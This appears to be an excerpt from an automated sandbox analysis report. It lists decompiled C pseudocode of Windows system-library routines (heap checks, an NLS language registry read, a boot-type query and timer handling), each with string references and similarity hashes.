
                                            Strings
                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0109256F
                                            • HEAP[%wZ]: , xrefs: 0109254F
                                            • HEAP: , xrefs: 0109255C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                            • API String ID: 0-3815128232
                                            • Opcode ID: 2889bd9add0d43c397cf3c93addefa3e0d790b3082440aa5d78adb66c6b75d85
                                            • Instruction ID: 5483b65cb6aaeb173c3be30a4f6e749dbcc62c8348e23dcd823db10ad8887edb
                                            • Opcode Fuzzy Hash: 2889bd9add0d43c397cf3c93addefa3e0d790b3082440aa5d78adb66c6b75d85
                                            • Instruction Fuzzy Hash: A2514834104250AAEBB4DE1EC8747767BF1EB44744F55889DE8C28B286DB3AD847FB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00FEE620(void* __ecx, short* __edx, short* _a4) {
                                            				char _v16;
                                            				char _v20;
                                            				intOrPtr _v24;
                                            				char* _v28;
                                            				char _v32;
                                            				char _v36;
                                            				char _v44;
                                            				signed int _v48;
                                            				intOrPtr _v52;
                                            				void* _v56;
                                            				void* _v60;
                                            				char _v64;
                                            				void* _v68;
                                            				void* _v76;
                                            				void* _v84;
                                            				signed int _t59;
                                            				signed int _t74;
                                            				signed short* _t75;
                                            				signed int _t76;
                                            				signed short* _t78;
                                            				signed int _t83;
                                            				short* _t93;
                                            				signed short* _t94;
                                            				short* _t96;
                                            				void* _t97;
                                            				signed int _t99;
                                            				void* _t101;
                                            				void* _t102;
                                            
                                            				_t80 = __ecx;
                                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                            				_t96 = __edx;
                                            				_v44 = __edx;
                                            				_t78 = 0;
                                            				_v56 = 0;
                                            				if(__ecx == 0 || __edx == 0) {
                                            					L28:
                                            					_t97 = 0xc000000d;
                                            				} else {
                                            					_t93 = _a4;
                                            					if(_t93 == 0) {
                                            						goto L28;
                                            					}
                                            					_t78 = E00FEF358(__ecx, 0xac);
                                            					if(_t78 == 0) {
                                            						_t97 = 0xc0000017;
                                            						L6:
                                            						if(_v56 != 0) {
                                            							_push(_v56);
                                            							E010295D0();
                                            						}
                                            						if(_t78 != 0) {
                                            							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                            						}
                                            						return _t97;
                                            					}
                                            					E0102FA60(_t78, 0, 0x158);
                                            					_v48 = _v48 & 0x00000000;
                                            					_t102 = _t101 + 0xc;
                                            					 *_t96 = 0;
                                            					 *_t93 = 0;
                                            					E0102BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                            					_v36 = 0x18;
                                            					_v28 =  &_v44;
                                            					_v64 = 0;
                                            					_push( &_v36);
                                            					_push(0x20019);
                                            					_v32 = 0;
                                            					_push( &_v64);
                                            					_v24 = 0x40;
                                            					_v20 = 0;
                                            					_v16 = 0;
                                            					_t97 = E01029600();
                                            					if(_t97 < 0) {
                                            						goto L6;
                                            					}
                                            					E0102BB40(0,  &_v36, L"InstallLanguageFallback");
                                            					_push(0);
                                            					_v48 = 4;
                                            					_t97 = L00FEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                            					if(_t97 >= 0) {
                                            						if(_v52 != 1) {
                                            							L17:
                                            							_t97 = 0xc0000001;
                                            							goto L6;
                                            						}
                                            						_t59 =  *_t78 & 0x0000ffff;
                                            						_t94 = _t78;
                                            						_t83 = _t59;
                                            						if(_t59 == 0) {
                                            							L19:
                                            							if(_t83 == 0) {
                                            								L23:
                                            								E0102BB40(_t83, _t102 + 0x24, _t78);
                                            								if(L00FF43C0( &_v48,  &_v64) == 0) {
                                            									goto L17;
                                            								}
                                            								_t84 = _v48;
                                            								 *_v48 = _v56;
                                            								if( *_t94 != 0) {
                                            									E0102BB40(_t84, _t102 + 0x24, _t94);
                                            									if(L00FF43C0( &_v48,  &_v64) != 0) {
                                            										 *_a4 = _v56;
                                            									} else {
                                            										_t97 = 0xc0000001;
                                            										 *_v48 = 0;
                                            									}
                                            								}
                                            								goto L6;
                                            							}
                                            							_t83 = _t83 & 0x0000ffff;
                                            							while(_t83 == 0x20) {
                                            								_t94 =  &(_t94[1]);
                                            								_t74 =  *_t94 & 0x0000ffff;
                                            								_t83 = _t74;
                                            								if(_t74 != 0) {
                                            									continue;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L23;
                                            						} else {
                                            							goto L14;
                                            						}
                                            						while(1) {
                                            							L14:
                                            							_t27 =  &(_t94[1]); // 0x2
                                            							_t75 = _t27;
                                            							if(_t83 == 0x2c) {
                                            								break;
                                            							}
                                            							_t94 = _t75;
                                            							_t76 =  *_t94 & 0x0000ffff;
                                            							_t83 = _t76;
                                            							if(_t76 != 0) {
                                            								continue;
                                            							}
                                            							goto L23;
                                            						}
                                            						 *_t94 = 0;
                                            						_t94 = _t75;
                                            						_t83 =  *_t75 & 0x0000ffff;
                                            						goto L19;
                                            					}
                                            				}
                                            			}
































                                            Strings
                                            • InstallLanguageFallback, xrefs: 00FEE6DB
                                            • @, xrefs: 00FEE6C0
                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FEE68C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                            • API String ID: 0-1757540487
                                            • Opcode ID: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                                            • Instruction ID: ef00adae1cbc27d5b81346d2d65f49de794019e3bc350f53130d69b24f1b5569
                                            • Opcode Fuzzy Hash: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
                                            • Instruction Fuzzy Hash: A351A0B66043569BD711DF28C890AABB3E8BF88714F04097EF995D7240FB34DA04C7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E0100B8E4(unsigned int __edx) {
                                            				void* __ecx;
                                            				void* __edi;
                                            				intOrPtr* _t16;
                                            				intOrPtr _t18;
                                            				void* _t27;
                                            				void* _t28;
                                            				unsigned int _t30;
                                            				intOrPtr* _t31;
                                            				unsigned int _t38;
                                            				void* _t39;
                                            				unsigned int _t40;
                                            
                                            				_t40 = __edx;
                                            				_t39 = _t28;
                                            				if( *0x10d8748 >= 1) {
                                            					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                            					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                            						_t18 =  *[fs:0x30];
                                            						__eflags =  *(_t18 + 0xc);
                                            						if( *(_t18 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E00FEB150();
                                            						} else {
                                            							E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                            						E00FEB150();
                                            						__eflags =  *0x10d7bc8;
                                            						if(__eflags == 0) {
                                            							E010A2073(_t27, 1, _t39, __eflags);
                                            						}
                                            					}
                                            				}
                                            				_t38 =  *(_t39 + 0xb8);
                                            				if(_t38 != 0) {
                                            					_t13 = _t40 >> 0xc;
                                            					__eflags = _t13;
                                            					while(1) {
                                            						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                            						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                            							break;
                                            						}
                                            						_t30 =  *_t38;
                                            						__eflags = _t30;
                                            						if(_t30 != 0) {
                                            							_t38 = _t30;
                                            							continue;
                                            						}
                                            						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                            						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                            						break;
                                            					}
                                            					return E0100AB40(_t39, _t38, 0, _t13, _t40);
                                            				} else {
                                            					_t31 = _t39 + 0x8c;
                                            					_t16 =  *_t31;
                                            					while(_t31 != _t16) {
                                            						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                            						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                            							return _t16;
                                            						}
                                            						_t16 =  *_t16;
                                            					}
                                            					return _t31;
                                            				}
                                            			}















                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: d9e05eb6568dcf4240960d00dda5f837bf43c0b84fec58ab65908c0da72b3b9e
                                            • Instruction ID: 9f91a373de411f6459b102a984dadcb3c47a46c513647ab9def4134bcd13d4e9
                                            • Opcode Fuzzy Hash: d9e05eb6568dcf4240960d00dda5f837bf43c0b84fec58ab65908c0da72b3b9e
                                            • Instruction Fuzzy Hash: 5211EE353095029FE76A9B19C491F7AB7A1EF40720F18806DE48ACB292D738D940D742
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E010AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v40;
                                            				char _v44;
                                            				intOrPtr _v48;
                                            				signed int _v52;
                                            				unsigned int _v56;
                                            				char _v60;
                                            				signed int _v64;
                                            				char _v68;
                                            				signed int _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				char _t87;
                                            				signed int _t90;
                                            				signed int _t94;
                                            				signed int _t100;
                                            				intOrPtr* _t113;
                                            				signed int _t122;
                                            				void* _t132;
                                            				void* _t135;
                                            				signed int _t139;
                                            				signed int* _t141;
                                            				signed int _t146;
                                            				signed int _t147;
                                            				void* _t153;
                                            				signed int _t155;
                                            				signed int _t159;
                                            				char _t166;
                                            				void* _t172;
                                            				void* _t176;
                                            				signed int _t177;
                                            				intOrPtr* _t179;
                                            
                                            				_t179 = __ecx;
                                            				_v48 = __edx;
                                            				_v68 = 0;
                                            				_v72 = 0;
                                            				_push(__ecx[1]);
                                            				_push( *__ecx);
                                            				_push(0);
                                            				_t153 = 0x14;
                                            				_t135 = _t153;
                                            				_t132 = E010ABBBB(_t135, _t153);
                                            				if(_t132 == 0) {
                                            					_t166 = _v68;
                                            					goto L43;
                                            				} else {
                                            					_t155 = 0;
                                            					_v52 = 0;
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					_v56 = __ecx[1];
                                            					if( *__ecx >> 8 < 2) {
                                            						_t155 = 1;
                                            						_v52 = 1;
                                            					}
                                            					_t139 = _a4;
                                            					_t87 = (_t155 << 0xc) + _t139;
                                            					_v60 = _t87;
                                            					if(_t87 < _t139) {
                                            						L11:
                                            						_t166 = _v68;
                                            						L12:
                                            						if(_t132 != 0) {
                                            							E010ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                            						}
                                            						L43:
                                            						if(_v72 != 0) {
                                            							_push( *((intOrPtr*)(_t179 + 4)));
                                            							_push( *_t179);
                                            							_push(0x8000);
                                            							E010AAFDE( &_v72,  &_v60);
                                            						}
                                            						L46:
                                            						return _t166;
                                            					}
                                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                            					asm("sbb edi, edi");
                                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                            					if(_t90 != 0) {
                                            						_push(0);
                                            						_push(0x14);
                                            						_push( &_v44);
                                            						_push(3);
                                            						_push(_t179);
                                            						_push(0xffffffff);
                                            						if(E01029730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                            							_push(_t139);
                                            							E010AA80D(_t179, 1, _v40, 0);
                                            							_t172 = 4;
                                            						}
                                            					}
                                            					_t141 =  &_v72;
                                            					if(E010AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                            						_v64 = _a4;
                                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                            						asm("sbb edi, edi");
                                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                            						if(_t94 != 0) {
                                            							_push(0);
                                            							_push(0x14);
                                            							_push( &_v24);
                                            							_push(3);
                                            							_push(_t179);
                                            							_push(0xffffffff);
                                            							if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                            								_push(_t141);
                                            								E010AA80D(_t179, 1, _v20, 0);
                                            								_t176 = 4;
                                            							}
                                            						}
                                            						if(E010AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                            							goto L11;
                                            						} else {
                                            							_t177 = _v64;
                                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                            							_t100 = _v52 + _v52;
                                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                            							 *(_t132 + 0x10) = _t146;
                                            							asm("bsf eax, [esp+0x18]");
                                            							_v52 = _t100;
                                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                            							_t47 =  &_a8;
                                            							 *_t47 = _a8 & 0x00000001;
                                            							if( *_t47 == 0) {
                                            								E01002280(_t179 + 0x30, _t179 + 0x30);
                                            							}
                                            							_t147 =  *(_t179 + 0x34);
                                            							_t159 =  *(_t179 + 0x38) & 1;
                                            							_v68 = 0;
                                            							if(_t147 == 0) {
                                            								L35:
                                            								E00FFB090(_t179 + 0x34, _t147, _v68, _t132);
                                            								if(_a8 == 0) {
                                            									E00FFFFB0(_t132, _t177, _t179 + 0x30);
                                            								}
                                            								asm("lock xadd [eax], ecx");
                                            								asm("lock xadd [eax], edx");
                                            								_t132 = 0;
                                            								_v72 = _v72 & 0;
                                            								_v68 = _v72;
                                            								if(E01007D50() == 0) {
                                            									_t113 = 0x7ffe0388;
                                            								} else {
                                            									_t177 = _v64;
                                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            								}
                                            								if( *_t113 == _t132) {
                                            									_t166 = _v68;
                                            									goto L46;
                                            								} else {
                                            									_t166 = _v68;
                                            									E0109FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                            									goto L12;
                                            								}
                                            							} else {
                                            								L23:
                                            								while(1) {
                                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                            										_t122 =  *_t147;
                                            										if(_t159 == 0) {
                                            											L32:
                                            											if(_t122 == 0) {
                                            												L34:
                                            												_v68 = 0;
                                            												goto L35;
                                            											}
                                            											L33:
                                            											_t147 = _t122;
                                            											continue;
                                            										}
                                            										if(_t122 == 0) {
                                            											goto L34;
                                            										}
                                            										_t122 = _t122 ^ _t147;
                                            										goto L32;
                                            									}
                                            									_t122 =  *(_t147 + 4);
                                            									if(_t159 == 0) {
                                            										L27:
                                            										if(_t122 != 0) {
                                            											goto L33;
                                            										}
                                            										L28:
                                            										_v68 = 1;
                                            										goto L35;
                                            									}
                                            									if(_t122 == 0) {
                                            										goto L28;
                                            									}
                                            									_t122 = _t122 ^ _t147;
                                            									goto L27;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					_v72 = _v72 & 0x00000000;
                                            					goto L11;
                                            				}
                                            			}





































                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction ID: ea66b2fc3411c237b1b37f46d7f50c541f365a237079b439334ed6c555d98530
                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction Fuzzy Hash: C891BF312043429FE764CEA9C841B6BBBE5BF84714F54896DF6D9CB280E774E904CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E010651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed short* _t63;
                                            				signed int _t64;
                                            				signed int _t65;
                                            				signed int _t67;
                                            				intOrPtr _t74;
                                            				intOrPtr _t84;
                                            				intOrPtr _t88;
                                            				intOrPtr _t94;
                                            				void* _t100;
                                            				void* _t103;
                                            				intOrPtr _t105;
                                            				signed int _t106;
                                            				short* _t108;
                                            				signed int _t110;
                                            				signed int _t113;
                                            				signed int* _t115;
                                            				signed short* _t117;
                                            				void* _t118;
                                            				void* _t119;
                                            
                                            				_push(0x80);
                                            				_push(0x10c05f0);
                                            				E0103D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                            				_t115 =  *(_t118 + 0xc);
                                            				 *(_t118 - 0x7c) = _t115;
                                            				 *((char*)(_t118 - 0x65)) = 0;
                                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            				_t113 = 0;
                                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                                            				_t100 = __ecx;
                                            				if(_t100 == 0) {
                                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                            					E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					 *((char*)(_t118 - 0x65)) = 1;
                                            					_t63 =  *(_t118 - 0x90);
                                            					_t101 = _t63[2];
                                            					_t64 =  *_t63 & 0x0000ffff;
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					L20:
                                            					_t65 = _t64 >> 1;
                                            					L21:
                                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                            					if(_t108 == 0) {
                                            						L27:
                                            						 *_t115 = _t65 + 1;
                                            						_t67 = 0xc0000023;
                                            						L28:
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                            						L29:
                                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                            						E010653CA(0);
                                            						return E0103D130(0, _t113, _t115);
                                            					}
                                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                            							 *_t108 = 0;
                                            						}
                                            						goto L27;
                                            					}
                                            					 *_t115 = _t65;
                                            					_t115 = _t65 + _t65;
                                            					E0102F3E0(_t108, _t101, _t115);
                                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                            					_t67 = 0;
                                            					goto L28;
                                            				}
                                            				_t103 = _t100 - 1;
                                            				if(_t103 == 0) {
                                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                            					_t74 = E01003690(1, _t117, 0xfc1810, _t118 - 0x74);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                            					_t101 = _t117[2];
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					if(_t74 < 0) {
                                            						_t64 =  *_t117 & 0x0000ffff;
                                            						_t115 =  *(_t118 - 0x7c);
                                            						goto L20;
                                            					}
                                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                            					_t115 =  *(_t118 - 0x7c);
                                            					goto L21;
                                            				}
                                            				if(_t103 == 1) {
                                            					_t105 = 4;
                                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                            					_push(_t118 - 0x70);
                                            					_push(0);
                                            					_push(0);
                                            					_push(_t105);
                                            					_push(_t118 - 0x78);
                                            					_push(0x6b);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = E0102AA90();
                                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            					_t113 = L01004620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                            					if(_t113 != 0) {
                                            						_push(_t118 - 0x70);
                                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                                            						_push(_t113);
                                            						_push(4);
                                            						_push(_t118 - 0x78);
                                            						_push(0x6b);
                                            						_t84 = E0102AA90();
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                            						if(_t84 < 0) {
                                            							goto L29;
                                            						}
                                            						_t110 = 0;
                                            						_t106 = 0;
                                            						while(1) {
                                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                            							 *(_t118 - 0x88) = _t106;
                                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                            								break;
                                            							}
                                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                            							_t106 = _t106 + 1;
                                            						}
                                            						_t88 = E0106500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                            						_t119 = _t119 + 0x1c;
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                            						if(_t88 < 0) {
                                            							goto L29;
                                            						}
                                            						_t101 = _t118 - 0x3c;
                                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                            						goto L21;
                                            					}
                                            					_t67 = 0xc0000017;
                                            					goto L28;
                                            				}
                                            				_push(0);
                                            				_push(0x20);
                                            				_push(_t118 - 0x60);
                                            				_push(0x5a);
                                            				_t94 = E01029860();
                                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                            				if(_t94 < 0) {
                                            					goto L29;
                                            				}
                                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                            					_t101 = L"Legacy";
                                            					_push(6);
                                            				} else {
                                            					_t101 = L"UEFI";
                                            					_push(4);
                                            				}
                                            				_pop(_t65);
                                            				goto L21;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                                            • Instruction ID: 122933dc0bdde9ee1c66bef31de420ef0877b5863a097cc5e82ea0c876e6fe7b
                                            • Opcode Fuzzy Hash: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
                                            • Instruction Fuzzy Hash: BF514D71A0061A9FDB25DFA8CD40BAEBBF8FF48740F14806DE689EB291D7719940CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E0100B944(signed int* __ecx, char __edx) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				char _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				signed int* _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr _v72;
                                            				intOrPtr _v76;
                                            				char _v77;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t65;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				char* _t73;
                                            				intOrPtr _t77;
                                            				intOrPtr _t78;
                                            				signed int _t82;
                                            				intOrPtr _t83;
                                            				void* _t87;
                                            				char _t88;
                                            				intOrPtr* _t89;
                                            				intOrPtr _t91;
                                            				void* _t97;
                                            				intOrPtr _t100;
                                            				void* _t102;
                                            				void* _t107;
                                            				signed int _t108;
                                            				intOrPtr* _t112;
                                            				void* _t113;
                                            				intOrPtr* _t114;
                                            				intOrPtr _t115;
                                            				intOrPtr _t116;
                                            				intOrPtr _t117;
                                            				signed int _t118;
                                            				void* _t130;
                                            
                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                            				_v8 =  *0x10dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                            				_t112 = __ecx;
                                            				_v77 = __edx;
                                            				_v48 = __ecx;
                                            				_v28 = 0;
                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                            				_t105 =  *_t5;
                                            				_v20 = 0;
                                            				_v16 = 0;
                                            				if(_t105 == 0) {
                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                            					_t60 =  *__ecx |  *_t50;
                                            					if(( *__ecx |  *_t50) != 0) {
                                            						 *__ecx = 0;
                                            						__ecx[1] = 0;
                                            						if(E01007D50() != 0) {
                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t65 = 0x7ffe0386;
                                            						}
                                            						if( *_t65 != 0) {
                                            							E010B8CD6(_t112);
                                            						}
                                            						_push(0);
                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t52);
                                            						_t60 = E01029E20();
                                            					}
                                            					L20:
                                            					_pop(_t107);
                                            					_pop(_t113);
                                            					_pop(_t87);
                                            					return E0102B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                            				}
                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                            				_t67 =  *_t8;
                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                            				_t108 =  *(_t67 + 0x14);
                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                            				_t105 = 0x2710;
                                            				asm("sbb eax, edi");
                                            				_v44 = _t88;
                                            				_v52 = _t108;
                                            				_t60 = E0102CE00(_t97, _t68, 0x2710, 0);
                                            				_v56 = _t60;
                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                            					L3:
                                            					 *(_t112 + 0x44) = _t60;
                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                            					 *_t112 = _t88;
                                            					 *(_t112 + 4) = _t108;
                                            					_v20 = _t60 * 0x2710;
                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                            					if(_v77 != 0) {
                                            						L16:
                                            						_v36 = _t88;
                                            						_v32 = _t108;
                                            						if(E01007D50() != 0) {
                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t73 = 0x7ffe0386;
                                            						}
                                            						if( *_t73 != 0) {
                                            							_t105 = _v40;
                                            							E010B8F6A(_t112, _v40, _t88, _t108);
                                            						}
                                            						_push( &_v28);
                                            						_push(0);
                                            						_push( &_v36);
                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t48);
                                            						_t60 = E0102AF60();
                                            						goto L20;
                                            					} else {
                                            						_t89 = 0x7ffe03b0;
                                            						do {
                                            							_t114 = 0x7ffe0010;
                                            							do {
                                            								_t77 =  *0x10d8628; // 0x0
                                            								_v68 = _t77;
                                            								_t78 =  *0x10d862c; // 0x0
                                            								_v64 = _t78;
                                            								_v72 =  *_t89;
                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                            								while(1) {
                                            									_t105 =  *0x7ffe000c;
                                            									_t100 =  *0x7ffe0008;
                                            									if(_t105 ==  *_t114) {
                                            										goto L8;
                                            									}
                                            									asm("pause");
                                            								}
                                            								L8:
                                            								_t89 = 0x7ffe03b0;
                                            								_t115 =  *0x7ffe03b0;
                                            								_t82 =  *0x7FFE03B4;
                                            								_v60 = _t115;
                                            								_t114 = 0x7ffe0010;
                                            								_v56 = _t82;
                                            							} while (_v72 != _t115 || _v76 != _t82);
                                            							_t83 =  *0x10d8628; // 0x0
                                            							_t116 =  *0x10d862c; // 0x0
                                            							_v76 = _t116;
                                            							_t117 = _v68;
                                            						} while (_t117 != _t83 || _v64 != _v76);
                                            						asm("sbb edx, [esp+0x24]");
                                            						_t102 = _t100 - _v60 - _t117;
                                            						_t112 = _v48;
                                            						_t91 = _v44;
                                            						asm("sbb edx, eax");
                                            						_t130 = _t105 - _v52;
                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                            							_t88 = _t102 - _t91;
                                            							asm("sbb edx, edi");
                                            							_t108 = _t105;
                                            						} else {
                                            							_t88 = 0;
                                            							_t108 = 0;
                                            						}
                                            						goto L16;
                                            					}
                                            				} else {
                                            					if( *(_t112 + 0x44) == _t60) {
                                            						goto L20;
                                            					}
                                            					goto L3;
                                            				}
                                            			}

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100B9A5
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 885266447-0
                                            • Opcode ID: 901157f6889ccdb7074be568850ac79e3644e97e4f966d820bba2c0a64d5a5cf
